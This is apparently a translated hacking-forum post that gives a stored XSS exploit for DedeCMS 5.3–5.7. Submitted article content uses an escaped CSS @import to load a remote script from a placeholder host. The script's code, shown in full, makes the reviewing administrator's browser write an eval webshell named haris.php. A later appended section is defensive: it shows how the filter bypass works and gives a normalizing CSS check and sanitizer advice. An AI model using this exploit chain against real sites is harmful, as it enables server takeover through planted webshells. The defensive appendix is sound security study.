Cause of the vulnerability: the editor's filtering is not strict enough, so a malicious script can be made to run. It can be used to getshell.
Why call it a 0day? Anything that can getshell counts as a 0day, I'd say (even a "chicken rib" can turn into a phoenix if you make the most of it).
So far I have only tested it on versions 5.3 to 5.7. For other, earlier versions, feel free to experiment yourselves.
Now for the exploitation method.
There are 2 conditions:
1. Registration is enabled
2. Article submission (contributions) is enabled
Register an account ---- publish an article
Fill in the content with:
<style>@im\port'\http://xxx.com/xss.css';</style>
Create a new file XSS.Css:
.body{
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
Create a new file xss.js with the following content:
var request = false;
// Obtain an XMLHttpRequest object: native object first, then legacy IE ActiveX fallbacks
if(window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if(request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if(window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for(var i=0; i<versions.length; i++) {
        try {
            // the original passed the whole array (versions) here, which always throws; it must be versions[i]
            request = new ActiveXObject(versions[i]);
        } catch(e) {}
    }
}
xmlhttp = request;
// Return the second-to-last path segment of the URL, i.e. the directory the current page lives in
function getFolder( url ){
    obj = url.split('/')
    return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
// POST the form to sys_sql_query.php in that directory; it runs in the reviewing admin's session
function add_admin(){
    var url= "/"+u+"/sys_sql_query.php";
    var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
    xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", params.length);
    xmlhttp.setRequestHeader("Connection", "Keep-Alive");
    xmlhttp.send(params);
}
When the administrator reviews this article, a one-line webshell haris.php is automatically generated in the data directory. Password: cmd
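Added example (my code, not from this post or from DedeCMS): the `@im\port` vector above gets past the editor because a string filter looks for the literal text `@import`, while the browser's CSS tokenizer decodes backslash escapes and drops comments before it sees the keyword. The JavaScript below puts a naive literal-match check beside one that normalizes the CSS first (strip `/* */` comments, decode escapes, lower-case, drop whitespace), and runs both over constructed samples including the post's own vector and a hex-escaped `javascript:` URL. The function names, the pattern lists and the sample strings are assumptions for illustration.

```javascript
// Added example, not code from the post or from DedeCMS: why a literal-string
// filter misses "@im\port", and how to normalize CSS before checking it.
// Function names, pattern lists and sample inputs are constructed for illustration.

// Remove /* ... */ comments first, as the tokenizer does ("@im/**/port" is "@import").
function stripCssComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Decode CSS escape sequences the way a CSS tokenizer does:
//   "\" + 1-6 hex digits (+ one optional whitespace)  -> that code point
//   "\" + any other non-newline character             -> that character literally
function decodeCssEscapes(css) {
  return css.replace(/\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\([^\n\r\f])/g, (m, hex, ch) => {
    if (hex !== undefined) {
      const cp = parseInt(hex, 16);
      return (cp === 0 || cp > 0x10ffff) ? '\ufffd' : String.fromCodePoint(cp);
    }
    return ch;
  });
}

// Normalized form used for matching: comments gone, escapes decoded,
// lower-cased, and ASCII whitespace/control characters removed.
function normalizeCss(css) {
  return decodeCssEscapes(stripCssComments(css))
    .toLowerCase()
    .replace(/[\x00-\x20]/g, '');
}

// The kind of check the post's vector bypasses: match the raw text as submitted.
const NAIVE_PATTERNS = [/@import/i, /javascript:/i, /expression\(/i];
function naiveFilterBlocks(css) {
  return NAIVE_PATTERNS.some((re) => re.test(css));
}

// Same idea, but matching on the normalized form. Patterns cover external
// stylesheet loading, script URL schemes, and legacy IE script-in-CSS features.
const STRICT_PATTERNS = [/@import/, /javascript:/, /vbscript:/, /expression\(/, /behavior:/];
function strictFilterBlocks(css) {
  const n = normalizeCss(css);
  return STRICT_PATTERNS.some((re) => re.test(n));
}

// Constructed samples. The first is the vector from the post.
const SAMPLES = {
  escapedImport: "@im\\port'\\http://xxx.com/xss.css';",
  commentedImport: "@im/**/port url(http://xxx.com/xss.css);",
  hexEscapedUrl: ".body{background-image:url('j\\61 vascript:alert(1)')}", // \61 is 'a'
  benign: "body{background-image:url('/images/bg.png');}",
};

// Run both checks over every sample; returns {name: {naive, strict}}.
function compareFilters(samples) {
  const out = {};
  for (const [name, css] of Object.entries(samples)) {
    out[name] = { naive: naiveFilterBlocks(css), strict: strictFilterBlocks(css) };
  }
  return out;
}

for (const [name, r] of Object.entries(compareFilters(SAMPLES))) {
  console.log(`${name}: naive=${r.naive} strict=${r.strict}`);
}
```

Normalizing before matching is a second line of defence, not the fix: contributor content should go through an allowlist sanitizer that drops `<style>` blocks and `style` attributes entirely, so there is nothing for an escape trick to hide in. The second half of the post (the reviewing admin's browser being driven to `sys_sql_query.php`) is a separate weakness, unauthenticated state-changing requests from a logged-in session, that this example does not address.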